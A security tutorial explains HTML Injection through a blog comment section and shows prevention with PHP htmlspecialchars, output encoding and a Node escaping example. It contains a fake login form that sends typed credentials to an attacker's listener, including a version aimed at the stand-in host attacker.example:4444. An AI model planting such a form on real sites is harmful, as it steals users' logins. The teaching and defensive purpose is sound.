HTML Injection
What is HTML Injection?
HTML Injection is a vulnerability that lets an attacker insert their own HTML markup into a web application's page. Because the browser renders the injected markup as part of the legitimate page, the attacker can deface content, add hyperlinks that lead users off-site, or plant fake forms. The snippet below is the simplest case: an anchor tag whose href attribute points at the attacker's site, so a link labelled "Blog" actually takes the user to the attacker's website.
<a href=https://attackerwebsite.com>Blog</a>
How does HTML Injection occur?
HTML Injection occurs when a web application takes input it does not control and writes it into a page without encoding it for the HTML context it lands in, so the browser parses the input as markup rather than displaying it as text. Any input point the attacker controls and that is later rendered can be the entry point: a URL parameter reflected into the page, a profile field, or, in the running example used here, the comment section of a blog. Visitors write comments as text, and if the application stores those comments and later echoes them into the page unchanged, any HTML in a comment becomes part of the page for every reader (stored HTML Injection).
The markup below is a fake login form with a username field, a password field and a submit button. Its action attribute points at the attacker's host and port, where a plain netcat listener is waiting; because the form has no method attribute, the browser submits it as a GET request, so any credentials a victim types arrive in the query string of the request the listener prints. Posted as a blog comment on a page with stored HTML Injection, it becomes a social-engineering lure that harvests credentials from other readers.
<form name="login" action="$IP:Port">
<table>
<tr><td>Username:</td><td><input type="text" name="username"/></td></tr>
<tr><td>Password:</td><td><input type="password" name="Password"/></td></tr>
</table>
<input type="submit" value="Login"/>
</form>
How can we prevent HTML Injection?
Preventing HTML Injection is the same problem as preventing XSS: treat all user input as untrusted and encode it for the context it is written into, at output time. In PHP the standard tool for the HTML body context is htmlspecialchars (w3schools.com/php/func_string_htmlspecialch..), which converts the characters that carry meaning in HTML, & (ampersand), " (double quote), < (less than) and > (greater than), into their HTML entities; pass the ENT_QUOTES flag (the default since PHP 8.1) so that ' (single quote) is converted as well, which matters whenever the value lands inside an attribute. A WAF (Web Application Firewall) adds defence in depth by blocking requests that match its rules for suspicious characters or tags, but it is a filter on input rather than a fix for the bug, and filters can be bypassed, so it should supplement output encoding rather than replace it. The code below shows htmlspecialchars converting a string that contains a <b> tag.
<?php
// Untrusted value containing markup; without encoding it would render as bold text.
$str = "This is some <b>bold</b> text.";
// Encode for the HTML body context before writing it into the page.
echo htmlspecialchars($str);
?>
With the script embedded in a minimal page, the HTML sent to the browser (what View Source shows) contains entities instead of tags:
<!DOCTYPE html>
<html>
<body>
This is some &lt;b&gt;bold&lt;/b&gt; text.
</body>
</html>
The browser displays this literally as "This is some <b>bold</b> text.", with the tags visible as text rather than rendered as bold, which is exactly why injected markup stays inert.
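To tie the comment-section scenario above to the fix, here is an added example (written for this page, not code from the original article) in plain JavaScript that runs under Node without a network. It builds the comment list two ways, first by concatenating stored comments straight into the markup, then through an escapeHtml function that mirrors PHP htmlspecialchars with ENT_QUOTES, and checks whether the fake login form from the article survives as live HTML. The comment data and the host attacker.example:4444 are constructed placeholders.

```javascript
// Added example (not from the original article): a toy server-side comment
// renderer in plain JavaScript, runnable with Node and no network access.
// It models the blog comment section used in the article: comments are
// stored as typed and later concatenated into the page HTML.

// Constructed sample data. The second comment is the article's fake login
// form; attacker.example:4444 is a placeholder, not a real listener.
const COMMENTS = [
  "Great post, thanks!",
  '<form name="login" action="http://attacker.example:4444">' +
    'Username: <input type="text" name="username"/>' +
    'Password: <input type="password" name="Password"/>' +
    '<input type="submit" value="Login"/></form>',
];

// Vulnerable renderer: each comment body is dropped straight into the
// markup, so anything a user typed is parsed by the browser as HTML.
function renderCommentsUnsafe(comments) {
  return comments.map((c) => `<li>${c}</li>`).join("\n");
}

// Equivalent of PHP htmlspecialchars() with ENT_QUOTES: the five characters
// that can open a tag, close a tag or terminate an attribute value become
// entities. '&' is replaced first so the entities produced by the later
// replacements are not themselves re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Hardened renderer: identical template, but the untrusted value is encoded
// for the HTML body context at the moment it is written out.
function renderCommentsSafe(comments) {
  return comments.map((c) => `<li>${escapeHtml(c)}</li>`).join("\n");
}

// A check a unit test can run against rendered output: the comment template
// never emits <form> or <input>, so any occurrence of those tags means user
// data was interpreted as markup.
function countInjectedElements(html) {
  const matches = html.match(/<(form|input)\b/gi);
  return matches ? matches.length : 0;
}

console.log("unsafe:", countInjectedElements(renderCommentsUnsafe(COMMENTS)));
console.log("safe:  ", countInjectedElements(renderCommentsSafe(COMMENTS)));
```

The unsafe renderer yields one live form and three live inputs; the safe one yields none, because every `<` in the comment arrives at the browser as `&lt;`. Note that escapeHtml is correct only for the HTML body and for quoted attribute values; a value placed inside a URL, a script block or an inline event handler needs the encoding for that context instead, which is why the usual advice is to lean on a template engine that encodes by default rather than on hand-rolled replacements.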